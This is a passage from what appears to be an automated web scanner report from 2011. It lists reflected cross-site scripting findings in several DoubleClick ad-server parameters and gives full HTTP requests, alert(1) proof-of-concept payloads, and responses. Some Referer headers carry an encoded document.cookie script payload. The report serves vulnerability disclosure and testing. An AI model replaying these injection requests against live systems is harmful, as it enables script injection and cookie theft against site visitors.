1.12. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pubICode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1dd4"-alert(1)-"7f0ce352b24 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
icles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc
...[SNIP]...

1.13. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8de9"-alert(1)-"949f2676f9f was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3
...[SNIP]...

1.14. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9b6a"-alert(1)-"cafab609dca was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/bn/geo_tx%3Fcid%3Dbn_im_nf_anb_opgeotxT_txG_pk_300x250%26priorityCode%3D4654800000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15c43"-alert(1)-"cd748a8fe0a was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4961
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 02 Feb 2011 20:27:49 GMT
Expires: Wed, 02 Feb 2011 20:27:49 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0ahttp://degrees.classesusa.com/schools/?sourceid=50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 300;
var winH =
...[SNIP]...

1.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138f5"-alert(1)-"eada4e3efbc was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
i8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg
...[SNIP]...

1.17. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66758"-alert(1)-"219072ecf8b was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW
...[SNIP]...

1.18. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78291"-alert(1)-"1aa4fa9a8f0 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

